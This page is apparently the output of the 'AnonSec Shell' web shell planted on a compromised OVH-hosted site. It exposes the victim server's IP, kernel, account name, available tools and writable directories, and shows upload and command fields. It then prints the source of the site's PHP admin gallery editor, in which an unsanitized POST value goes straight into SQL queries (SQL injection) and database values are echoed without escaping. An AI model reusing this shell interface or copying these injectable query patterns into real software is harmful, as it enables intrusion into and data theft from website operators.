AnonSec Shell
Server IP : 149.202.105.228  /  Your IP : 216.73.216.18
Web Server : Apache
System : Linux webm129.cluster030.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User : atfycaf ( 116275)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/atfycaf/www/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     

Current File : /home/atfycaf/www/admin//galleryPhotoEdit.php
<?php
$thisCheckID	= 38;
include "globalVars.php";

include "header.php";
?>

				<h2>Update a Photo Gallery</h2>
<?php

if (isset($_POST["updateGalleryCat"])) {

	$catID		= cleanPost($_POST["catID"], $conn);
	$catTitle	= cleanPost($_POST["catTitle"], $conn);

	mysqli_query($conn, "UPDATE photoGalleryCats SET catTitle = '". addslashes($catTitle) ."' WHERE id = '$catID'") or die (mysqli_error($conn));

	$trackDate		= date("Y-m-d H:i:s");
	mysqli_query($conn, "INSERT INTO userActions (dateCreated, adminID, pageTracking, databaseUpdated, updateDetails) VALUES ('$trackDate', '$adminID', 'admin/galleryPhotoEdit.html', 'photoGalleryCats', 'The User ". addslashes($adminName) ." &lt;$adminEmail&gt; updated the ". addslashes($catTitle) ." photo gallery ID: $catID')");

	echo "<p><strong>Success!</strong> The Gallery Category $catTitle has been updated.</p>";

} elseif (isset($_POST["getGallery"])) {
	$galleryID	= $_POST["galleryID"];

	if ($galleryID == 9999) {
		$catTitle	= "Archived Photos";
	} else {
		$galleryCatQuery = mysqli_query($conn, "SELECT catTitle FROM photoGalleryCats WHERE id = '$galleryID'");
		while ($gCQ = mysqli_fetch_array($galleryCatQuery)) {
			$catTitle		= $gCQ["catTitle"];
		}
	}
	?>
	<h3><?php echo $catTitle ?></h3>
	<?php
	if (in_array(37, $adminPriv)) {
		?>
	<form action="galleryPhotoNew.html" method="post">
		<input type="hidden" name="galleryID" value="<?php echo $galleryID ?>">
		<input type="submit" class="submitButton" name="getGallery" value="Upload More Photos" />
	</form>
		<?php
	}
	?>
    <input type="hidden" id="galleryID" value="<?php echo $galleryID ?>">
	<div id="galleryLayout">
	<?php
	$photosQuery = mysqli_query($conn, "SELECT * FROM photoGallery WHERE galleryID = '$galleryID' ORDER BY id ASC") or die (mysqli_error($conn));
	while ($pQ = mysqli_fetch_array($photosQuery)) {
		$imageID	= $pQ["id"];
		$imageURL	= $pQ["imageURL"];
		$imageTitle	= $pQ["imageTitle"];

		$displayURL		= substr_replace($imageURL, "-thumb", "-4", 0);
		?>
		<div class="galleryLayoutContainer">
			<div class="galleryLayoutBox">
				<div class="galleryLayoutPhoto"><img src="<?php echo $Iurl ?>gallery/<?php echo $displayURL ?>" width="300"></div>
				<div class="galleryLayoutTitle">
					<input type="text" id="photoTitle<?php echo $imageID ?>" class="galleryPhotoTitle" placeholder="Photo Title" value="<?php echo $imageTitle ?>">
				</div>
				<button type="button" class="galleryLayoutSave" id="photoTitle<?php echo $imageID ?>Save" data-pid="<?php echo $imageID ?>" disabled>Save</button>
				<?php
				$galleryCatsQuery = mysqli_query($conn, "SELECT * FROM photoGalleryCats WHERE id != '$galleryID' ORDER BY catTitle ASC") or die (mysqli_error($conn));
				if (mysqli_num_rows($galleryCatsQuery) > 0) {
					?>
				<div class="galleryLayoutTitle">
					<select name="pGalleryID" class="pGalleryID">
						<option value="">Move to Another Gallery</option>
					<?php
					while ($gCQ = mysqli_fetch_array($galleryCatsQuery)) {
						$catID		= $gCQ["id"];
						$catTitle	= $gCQ["catTitle"];
						?>
						<option value="<?php echo $catID ?>"><?php echo $catTitle ?></option>
						<?php
					}
					?>
					</select>
					<input type="hidden" class="pid" value="<?php echo $imageID ?>">
				</div>
					<?php
				}
				if (in_array(39, $adminPriv)) {
					?>
				<a id="del<?php echo $imageID ?>" class="delPhoto" title="Delete this Photo">X</a>
					<?php
				}
				?>
			</div>
		</div>
		<?php
	}
	?>
	</div>
	<?php
} else {
	?>
	<div class="descTab" id="htmlSelectorTab">
	<?php
	$galleryCatsQuery = mysqli_query($conn, "SELECT * FROM photoGalleryCats ORDER BY catTitle ASC") or die (mysqli_error($conn));
	while ($gCQ = mysqli_fetch_array($galleryCatsQuery)) {
		$galleryID	= $gCQ["id"];
		$catTitle	= $gCQ["catTitle"];
		$numPhotosQuery = mysqli_query($conn, "SELECT * FROM photoGallery WHERE galleryID = '$galleryID'") or die (mysqli_error($conn));
		?>
		<div class="pFormRow">
			<div class="pFormEditTitle"><?php echo $catTitle ?><br><span style="font-size:12px; font-weight:400;"><?php echo mysqli_num_rows($numPhotosQuery) ?> Photos</span></div>
			<div class="pFormEditButtons">
				<form action="galleryPhotoEdit.html" method="post"><input type="hidden" name="galleryID" value="<?php echo $galleryID ?>" />
					<input type="submit" class="submitButton" name="getGallery" value="Edit This Gallery">
				</form>
			</div>
		</div>
		<?php
	}
	$archivedPhotosQuery = mysqli_query($conn, "SELECT * FROM photoGallery WHERE galleryID = '9999'") or die (mysqli_error($conn));
	if (mysqli_num_rows($archivedPhotosQuery) > 0) {
		?>
		<div class="pFormRow">
			<div class="pFormEditTitle">Archived Photos<br><span style="font-size:12px; font-weight:400;"><?php echo mysqli_num_rows($archivedPhotosQuery) ?> Photos</span></div>
			<div class="pFormEditButtons">
				<form action="galleryPhotoEdit.html" method="post"><input type="hidden" name="galleryID" value="9999" />
					<input type="submit" class="submitButton" name="getGallery" value="Edit This Gallery">
				</form>
			</div>
		</div>
		<?php
	}
	?>
	</div>
	<?php
}
?>

<?php
include "footer.php";
?>

Anon7 - 2022
AnonSec Team